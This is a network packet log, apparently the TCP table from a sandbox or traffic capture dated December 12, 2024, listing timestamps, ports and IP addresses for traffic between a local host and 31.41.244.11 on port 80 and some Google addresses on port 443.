                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.266021967 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.266057014 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.386464119 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.386482000 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.386594057 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.390701056 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.395606041 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.438709974 CET49895443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.438828945 CET4434989534.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.438949108 CET49895443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.457535028 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.457561016 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.457642078 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.461736917 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.461849928 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.461925030 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.470309973 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.470357895 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.470395088 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.470426083 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.478740931 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.478846073 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.479020119 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.487212896 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.487267017 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.487344027 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.495786905 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.495836020 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.495970964 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.496603012 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.504157066 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.504458904 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.504529953 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.512628078 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.512664080 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.512739897 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.521094084 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.521205902 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.521266937 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.529524088 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.529597998 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.529659986 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.531073093 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.538106918 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.538202047 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.538259983 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.546093941 CET49895443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.546133995 CET4434989534.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.577403069 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.577486992 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.577564001 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.649627924 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.649672985 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.649738073 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.649738073 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.652271032 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.652323008 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.652355909 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.652633905 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.656985998 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.657043934 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.657069921 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.657238007 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.661986113 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.662061930 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.662091017 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.662106991 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.666749001 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.666800976 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.666851997 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.666898012 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.671595097 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.671703100 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.671751022 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.676366091 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.676420927 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.676459074 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.676470995 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.680973053 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.681026936 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.681029081 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.681113005 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.685657024 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.685704947 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.685758114 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.685801983 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.690356970 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.690465927 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.690468073 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.690511942 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.695139885 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.695210934 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.695246935 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.695327997 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.699695110 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.699738979 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.699908018 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.699949980 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.704447031 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.704498053 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.704528093 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.704579115 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.709549904 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.709611893 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.709676027 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.709714890 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.711549997 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.712152004 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.712168932 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.712234020 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.712686062 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.712770939 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.712904930 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.712924957 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.712968111 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.713030100 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.713114977 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.713190079 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.715573072 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.716696024 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.716738939 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.716773987 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.717000008 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.720501900 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.720551968 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.720593929 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.720628977 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.724356890 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.724438906 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.724498034 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.724541903 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.728169918 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.728213072 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.728269100 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.728415966 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.731992006 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.732094049 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.732124090 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.732167006 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.735815048 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.735914946 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.735974073 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739171028 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739217997 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739373922 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739705086 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739717007 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739723921 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739774942 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739806890 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.739850044 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.769598961 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.769644022 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.769655943 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.769685030 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.771692991 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.771748066 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.771770000 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.771833897 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.841583967 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.841660023 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.841681004 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.841754913 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.843053102 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.843106985 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.843130112 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.843173027 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.846023083 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.846079111 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.846101999 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.846174002 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.848974943 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.849025011 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.849127054 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.849174023 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.852082968 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.852114916 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.852142096 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.852153063 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.854809046 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.854942083 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.854974031 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.855001926 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.857551098 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.857603073 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.857913017 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.858623981 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.860384941 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.860434055 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.860481024 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.860523939 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.863018036 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.863068104 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.863099098 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.863143921 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.865683079 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.865737915 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.865952969 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.865998030 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.868295908 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.868350029 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.868361950 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.868480921 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.870873928 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.870932102 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.870944023 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.870990992 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.873421907 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.873482943 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.873573065 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.875585079 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.875967026 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.876064062 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.876077890 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.876113892 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.878582954 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.878628969 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.878694057 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.878737926 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.881181955 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.881242990 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.881263018 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.882715940 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.883737087 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.883785009 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.883889914 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.886337042 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.886383057 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.886406898 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.886511087 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.889272928 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.889324903 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.889332056 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.889369011 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.891489029 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.891547918 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.891601086 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.891777992 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.894067049 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.894103050 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.894119024 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.894140005 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.896676064 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.896723032 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.896832943 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.896878004 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.898524046 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.898574114 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.898648977 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.898705006 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.900489092 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.900537014 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.900677919 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.900722027 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.902271032 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.902283907 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.902323961 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.902338982 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.904112101 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.904181957 CET4989080192.168.2.1031.41.244.11
